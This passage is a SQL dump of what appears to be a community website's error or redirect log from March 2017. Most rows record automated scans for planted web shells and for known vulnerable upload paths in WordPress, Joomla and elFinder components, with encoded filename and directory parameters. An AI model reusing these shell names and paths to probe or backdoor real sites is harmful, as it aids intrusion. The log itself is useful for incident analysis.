05:54:07','0000-00-00 00:00:00'),(7271,'http://hallcrestheights.org/wp-data.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:54:47','0000-00-00 00:00:00'),(7272,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=MTB0Y1NLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:55:05','0000-00-00 00:00:00'),(7273,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=MTB0Y1NLLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:55:24','0000-00-00 00:00:00'),(7274,'http://hallcrestheights.org/wp-content/plugins/myshe.php?z3=MTB0Y1NLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:55:43','0000-00-00 00:00:00'),(7275,'http://hallcrestheights.org/wp-content/plugins/wp-cache.php?z3=MTB0Y1NLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-06 05:56:04','0000-00-00 00:00:00'),(7276,'http://hallcrestheights.org/wp-content/plugins/wp-footers.php?z3=MTB0Y1NLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:56:57','0000-00-00 00:00:00'),(7277,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=MTB0Y1NLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',4,0,'2017-03-06 05:57:20','0000-00-00 00:00:00'),(7278,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=MTB0Y1NLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:57:48','0000-00-00 00:00:00'),(7279,'http://hallcrestheights.org/wp-content/plugins/SocketIontrol.php?z3=MTB0Y1NLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:58:11','0000-00-00 00:00:00'),(7280,'http://hallcrestheights.org/wp-content/plugins/SocketIasrgasfontrol.php?z3=MTB0Y1NLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:58:32','0000-00-00 00:00:00'),(7281,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=MTB0Y1NLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:59:14','0000-00-00 00:00:00'),(7282,'http://hallcrestheights.org/head.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:59:34','0000-00-00 00:00:00'),(7283,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=MTB0Y1NLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-06 06:00:15','0000-00-00 00:00:00'),(7284,'http://hallcrestheights.org/cache/list.php?z3=MTB0Y1NLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 06:00:38','0000-00-00 00:00:00'),(7285,'http://hallcrestheights.org/images/interface.php?z3=MTB0Y1NLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-06 06:00:59','0000-00-00 00:00:00'),(7286,'http://hallcrestheights.org/sqldebug.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 06:01:19','0000-00-00 00:00:00'),(7287,'http://hallcrestheights.org/xmlrpc-activate.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 06:01:42','0000-00-00 00:00:00'),(7288,'http://hallcrestheights.org/keep.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 06:03:53','0000-00-00 00:00:00'),(7289,'http://hallcrestheights.org/tmpos.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 06:04:13','0000-00-00 00:00:00'),(7290,'http://hallcrestheights.org/link.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 06:04:39','0000-00-00 00:00:00'),(7291,'http://hallcrestheights.org/dcodzu.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 06:05:00','0000-00-00 00:00:00'),(7292,'http://hallcrestheights.org/codd.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-06 06:05:22','0000-00-00 00:00:00'),(7293,'http://hallcrestheights.org/cache/wcache7675n.PHP?z3=MTB0Y1NLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-06 06:06:09','0000-00-00 00:00:00'),(7294,'http://hallcrestheights.org/modules/mod_bookmark/helper.php?z3=MTB0Y1NLLnBocA==&z4=L21vZHVsZXMvbW9kX2Jvb2ttYXJrLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 06:07:10','0000-00-00 00:00:00'),(7295,'http://hallcrestheights.org/content.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 06:07:35','0000-00-00 00:00:00'),(7296,'http://hallcrestheights.org/wp-content/plugins/sfn.php?z3=MTB0Y1NLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-06 06:07:53','0000-00-00 00:00:00'),(7297,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=MTB0Y1NLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-06 06:08:11','0000-00-00 00:00:00'),(7298,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=MTB0Y1NLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-06 06:08:31','0000-00-00 00:00:00'),(7299,'http://hallcrestheights.org/shootmei.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 06:08:51','0000-00-00 00:00:00'),(7300,'http://hallcrestheights.org/dcodqg.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 06:09:12','0000-00-00 00:00:00'),(7301,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/10tcSK.php',NULL,'','',1,0,'2017-03-06 06:09:34','0000-00-00 00:00:00'),(7302,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/10tcSK.php',NULL,'','',1,0,'2017-03-06 06:09:45','0000-00-00 00:00:00'),(7303,'http://hallcrestheights.org/wp-content/uploads/10tcSK.php',NULL,'','',1,0,'2017-03-06 06:09:53','0000-00-00 00:00:00'),(7304,'http://hallcrestheights.org/10tcSK.php',NULL,'','',1,0,'2017-03-06 06:10:00','0000-00-00 00:00:00'),(7305,'http://hallcrestheights.org/sites/all/libraries/elfinder/files/10tcSK.php',NULL,'','',1,0,'2017-03-06 06:10:08','0000-00-00 00:00:00'),(7306,'http://www.hallcrestheights.org/i20162632-k49189-yembjv-htqqdckz-fltz-terqb-wnsw-nsnjplp-ftrrjnc/',NULL,'https://search.yahoo.co.jp/','',9,0,'2017-03-06 14:05:45','0000-00-00 00:00:00'),(7307,'http://hallcrestheights.org/index.php/en/?option=com_intranet&view=calendar&month=1',NULL,'http://www.google.com/','',2,0,'2017-03-06 17:09:24','0000-00-00 00:00:00'),(7308,'http://hallcrestheights.org/index.php/en/?option=com_intranet&view=weeklyattendance&layout=weeklypdf&userid=940&weekstartdate=2017-02-20&weekuptodate=1',NULL,'http://www.google.com/','',1,0,'2017-03-07 02:31:58','0000-00-00 00:00:00'),(7309,'http://hallcrestheights.org/files/hh_newsletter_february_2013.pdf',NULL,'','',19,0,'2017-03-07 03:26:12','0000-00-00 00:00:00'),(7310,'http://hallcrestheights.org/files/HH_Newsletter_201604.pdf',NULL,'http://hallcrestheights.org/association/newsletters.html','',3,0,'2017-03-07 16:22:22','0000-00-00 00:00:00'),(7311,'http://hallcrestheights.org/admin/login.php',NULL,'','',15,0,'2017-03-07 17:00:54','0000-00-00 00:00:00'),(7312,'http://hallcrestheights.org/news.html',NULL,'','',2,0,'2017-03-08 17:31:47','0000-00-00 00:00:00'),(7313,'http://hallcrestheights.org/wp-content/uploads/88366882.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2017-03-09 08:31:11','0000-00-00 00:00:00'),(7314,'http://hallcrestheights.org/80554971.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2017-03-09 08:31:13','0000-00-00 00:00:00'),(7315,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/28925797.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2017-03-09 08:31:15','0000-00-00 00:00:00'),(7316,'http://hallcrestheights.org/9355993.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2017-03-09 08:31:18','0000-00-00 00:00:00'),(7317,'http://hallcrestheights.org/wp-content/plugins/8727050.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2017-03-09 08:32:01','0000-00-00 00:00:00'),(7318,'http://hallcrestheights.org/sites/all/libraries/elfinder/files/5160129.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2017-03-09 08:32:03','0000-00-00 00:00:00'),(7319,'http://hallcrestheights.org//wp-content/uploads/files/guest/88347974.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2017-03-09 08:32:07','0000-00-00 00:00:00'),(7320,'http://hallcrestheights.org//wp-content/uploads/2017/3/641308.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2017-03-09 08:32:09','0000-00-00 00:00:00'),(7321,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/8087549.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2017-03-09 08:32:11','0000-00-00 00:00:00'),(7322,'http://www.hallcrestheights.org/ixnmuea-hwhiozhj-xbnwpgey-ooayiku-ksszqc-i20162633-ebaqd-omytniho-lbde-k128-ntafym-luze-xtlf-ggcsd.htm',NULL,'https://www.google.co.jp/','',3,0,'2017-03-09 09:48:22','0000-00-00 00:00:00'),(7323,'http://hallcrestheights.org/sqlbak.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 12:30:02','0000-00-00 00:00:00'),(7324,'http://hallcrestheights.org/sql-bak.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-09 12:30:04','0000-00-00 00:00:00'),(7325,'http://hallcrestheights.org/email.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 12:30:58','0000-00-00 00:00:00'),(7326,'http://hallcrestheights.org/cache/news.php?z3=VkZ4VlF1LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 12:34:38','0000-00-00 00:00:00'),(7327,'http://hallcrestheights.org/tmp.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',3,0,'2017-03-09 12:34:41','0000-00-00 00:00:00'),(7328,'http://hallcrestheights.org/shootme.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-03-09 12:36:01','0000-00-00 00:00:00'),(7329,'http://hallcrestheights.org/jconfig.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 12:43:14','0000-00-00 00:00:00'),(7330,'http://hallcrestheights.org/media/reads.php?z3=VkZ4VlF1LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-09 12:43:26','0000-00-00 00:00:00'),(7331,'http://hallcrestheights.org/media/1ndex.php?z3=VkZ4VlF1LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 12:44:26','0000-00-00 00:00:00'),(7332,'http://hallcrestheights.org/libraries/joomla/jmails.php?z3=VkZ4VlF1LnBocA==&z4=L2xpYnJhcmllcy9qb29tbGEv',NULL,'hallcrestheights.org','',2,0,'2017-03-09 12:44:30','0000-00-00 00:00:00'),(7333,'http://hallcrestheights.org/error-logs.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 12:46:34','0000-00-00 00:00:00'),(7334,'http://hallcrestheights.org/media/404.php?z3=VkZ4VlF1LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-09 12:47:34','0000-00-00 00:00:00'),(7335,'http://hallcrestheights.org/media/tmp.php?z3=VkZ4VlF1LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 12:48:45','0000-00-00 00:00:00'),(7336,'http://hallcrestheights.org/r3x.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 12:48:47','0000-00-00 00:00:00'),(7337,'http://hallcrestheights.org/HH_0109.pdf',NULL,'','',15,0,'2017-03-09 12:51:22','0000-00-00 00:00:00'),(7338,'http://hallcrestheights.org/images/stories/0day.php?z3=VkZ4VlF1LnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 12:52:10','0000-00-00 00:00:00'),(7339,'http://hallcrestheights.org/includes/u2p.php?z3=VkZ4VlF1LnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 12:54:23','0000-00-00 00:00:00'),(7340,'http://hallcrestheights.org/images/xxx.php?z3=VkZ4VlF1LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-09 12:54:25','0000-00-00 00:00:00'),(7341,'http://hallcrestheights.org/al277.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 12:55:14','0000-00-00 00:00:00'),(7342,'http://hallcrestheights.org/roubt.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 12:57:04','0000-00-00 00:00:00'),(7343,'http://hallcrestheights.org/includes.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 12:57:09','0000-00-00 00:00:00'),(7344,'http://hallcrestheights.org/images/al277.php?z3=VkZ4VlF1LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-09 13:00:08','0000-00-00 00:00:00'),(7345,'http://hallcrestheights.org/webconfig.txt.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 13:00:16','0000-00-00 00:00:00'),(7346,'http://hallcrestheights.org/cache/cachee.php?z3=VkZ4VlF1LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 13:04:24','0000-00-00 00:00:00'),(7347,'http://hallcrestheights.org/thumb.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-09 13:05:43','0000-00-00 00:00:00'),(7348,'http://hallcrestheights.org/configbak.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-09 13:07:11','0000-00-00 00:00:00'),(7349,'http://hallcrestheights.org/wp-main.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-09 13:07:44','0000-00-00 00:00:00'),(7350,'http://hallcrestheights.org/install.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 13:12:22','0000-00-00 00:00:00'),(7351,'http://hallcrestheights.org/images/1ndex.php?z3=VkZ4VlF1LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-09 13:13:45','0000-00-00 00:00:00'),(7352,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=VkZ4VlF1LnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-09 13:13:54','0000-00-00 00:00:00'),(7353,'http://hallcrestheights.org/injctory.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 13:17:25','0000-00-00 00:00:00'),(7354,'http://hallcrestheights.org/mmytc.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 13:18:32','0000-00-00 00:00:00'),(7355,'http://hallcrestheights.org/images/laj.php?z3=VkZ4VlF1LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-09 13:21:00','0000-00-00 00:00:00'),(7356,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=VkZ4VlF1LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 13:21:28','0000-00-00 00:00:00'),(7357,'http://hallcrestheights.org/wsdl.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 13:22:40','0000-00-00 00:00:00'),(7358,'http://hallcrestheights.org/goog1es.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-09 13:23:55','0000-00-00 00:00:00'),(7359,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=VkZ4VlF1LnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 13:24:21','0000-00-00 00:00:00'),(7360,'http://hallcrestheights.org/news.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 13:27:17','0000-00-00 00:00:00'),(7361,'http://hallcrestheights.org/SessionController.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 13:28:15','0000-00-00 00:00:00'),(7362,'http://hallcrestheights.org/maill.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 13:30:27','0000-00-00 00:00:00'),(7363,'http://hallcrestheights.org/M-J!r4ya-F4r3s.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 13:34:23','0000-00-00 00:00:00'),(7364,'http://hallcrestheights.org/google-assist.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 13:36:48','0000-00-00 00:00:00'),(7365,'http://hallcrestheights.org/images/google-assist.php?z3=VkZ4VlF1LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-09 13:38:57','0000-00-00 00:00:00'),(7366,'http://hallcrestheights.org/images/robots.txt.php?z3=VkZ4VlF1LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-09 13:40:05','0000-00-00 00:00:00'),(7367,'http://hallcrestheights.org/elements.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 13:40:10','0000-00-00 00:00:00'),(7368,'http://hallcrestheights.org/xmlsrpc.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 13:42:08','0000-00-00 00:00:00'),(7369,'http://hallcrestheights.org/images/head.php?z3=VkZ4VlF1LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-09 13:47:27','0000-00-00 00:00:00'),(7370,'http://hallcrestheights.org/show.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 13:57:22','0000-00-00 00:00:00'),(7371,'http://hallcrestheights.org/images/defau1t.php?z3=VkZ4VlF1LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-09 13:57:34','0000-00-00 00:00:00'),(7372,'http://hallcrestheights.org/bk.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 14:00:14','0000-00-00 00:00:00'),(7373,'http://hallcrestheights.org/infos.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-09 14:04:05','0000-00-00 00:00:00'),(7374,'http://hallcrestheights.org/cache/defau1t.php?z3=VkZ4VlF1LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 14:04:22','0000-00-00 00:00:00'),(7375,'http://hallcrestheights.org/A.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 14:05:01','0000-00-00 00:00:00'),(7376,'http://hallcrestheights.org/bookmark.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 14:05:52','0000-00-00 00:00:00'),(7377,'http://hallcrestheights.org/wp-data.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-09 14:08:48','0000-00-00 00:00:00'),(7378,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=VkZ4VlF1LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-09 14:09:59','0000-00-00 00:00:00'),(7379,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=VkZ4VlF1LnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-09 14:10:02','0000-00-00 00:00:00'),(7380,'http://hallcrestheights.org/wp-content/plugins/myshe.php?z3=VkZ4VlF1LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-09 14:10:14','0000-00-00 00:00:00'),(7381,'http://hallcrestheights.org/wp-content/plugins/wp-cache.php?z3=VkZ4VlF1LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-09 14:10:22','0000-00-00 00:00:00'),(7382,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=VkZ4VlF1LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-09 14:12:08','0000-00-00 00:00:00'),(7383,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=VkZ4VlF1LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-09 14:12:20','0000-00-00 00:00:00'),(7384,'http://hallcrestheights.org/wp-content/plugins/SocketIasrgasfontrol.php?z3=VkZ4VlF1LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-09 14:15:40','0000-00-00 00:00:00'),(7385,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=VkZ4VlF1LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-09 14:19:10','0000-00-00 00:00:00'),(7386,'http://hallcrestheights.org/head.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 14:19:14','0000-00-00 00:00:00'),(7387,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=VkZ4VlF1LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-09 14:22:13','0000-00-00 00:00:00'),(7388,'http://hallcrestheights.org/images/interface.php?z3=VkZ4VlF1LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-09 14:24:08','0000-00-00 00:00:00'),(7389,'http://hallcrestheights.org/sqldebug.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 14:25:54','0000-00-00 00:00:00'),(7390,'http://hallcrestheights.org/keep.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 14:32:31','0000-00-00 00:00:00'),(7391,'http://hallcrestheights.org/link.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-09 14:34:21','0000-00-00 00:00:00'),(7392,'http://hallcrestheights.org/dcodzu.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 14:34:25','0000-00-00 00:00:00'),(7393,'http://hallcrestheights.org/codd.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 14:35:12','0000-00-00 00:00:00'),(7394,'http://hallcrestheights.org/cache/wcache7675n.PHP?z3=VkZ4VlF1LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 14:36:23','0000-00-00 00:00:00'),(7395,'http://hallcrestheights.org/modules/mod_bookmark/helper.php?z3=VkZ4VlF1LnBocA==&z4=L21vZHVsZXMvbW9kX2Jvb2ttYXJrLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 14:37:21','0000-00-00 00:00:00'),(7396,'http://hallcrestheights.org/content.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-09 14:39:05','0000-00-00 00:00:00'),(7397,'http://hallcrestheights.org/wp-content/plugins/sfn.php?z3=VkZ4VlF1LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-09 14:40:01','0000-00-00 00:00:00'),(7398,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=VkZ4VlF1LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-09 14:41:00','0000-00-00 00:00:00'),(7399,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=VkZ4VlF1LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-09 14:41:49','0000-00-00 00:00:00'),(7400,'http://hallcrestheights.org/dcodqg.php?z3=VkZ4VlF1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-09 14:44:04','0000-00-00 00:00:00'),(7401,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/VFxVQu.php',NULL,'','',1,0,'2017-03-09 14:44:09','0000-00-00 00:00:00'),(7402,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/VFxVQu.php',NULL,'','',1,0,'2017-03-09 14:44:12','0000-00-00 00:00:00'),(7403,'http://hallcrestheights.org/wp-content/uploads/VFxVQu.php',NULL,'','',1,0,'2017-03-09 14:44:23','0000-00-00 00:00:00'),(7404,'http://hallcrestheights.org/VFxVQu.php',NULL,'','',1,0,'2017-03-09 14:44:26','0000-00-00 00:00:00'),(7405,'http://hallcrestheights.org/sites/all/libraries/elfinder/files/VFxVQu.php',NULL,'','',1,0,'2017-03-09 14:44:28','0000-00-00 00:00:00'),(7406,'http://www.hallcrestheights.org/zmku-k712-edtzjiv-yoqxi-fgxuhx-ptvuhmi-wnzkorpv-i20162634-ubfgnqt-pmhprbik-zonm.htm',NULL,'','',3,0,'2017-03-09 15:04:17','0000-00-00 00:00:00'),(7407,'http://www.hallcrestheights.org/images/xxu.php',NULL,'','',1,0,'2017-03-10 12:31:45','0000-00-00 00:00:00'),(7408,'http://www.hallcrestheights.org/x.php',NULL,'','',1,0,'2017-03-10 12:31:46','0000-00-00 00:00:00'),(7409,'http://www.hallcrestheights.org/cache/news.php?z3=TUxlUlhyLnBocA==&z4=L2NhY2hlLw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:35:53','0000-00-00 00:00:00'),(7410,'http://www.hallcrestheights.org/tmp.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',4,0,'2017-03-10 12:35:57','0000-00-00 00:00:00'),(7411,'http://www.hallcrestheights.org/shootme.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:35:59','0000-00-00 00:00:00'),(7412,'http://www.hallcrestheights.org/configurationbak.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:36:02','0000-00-00 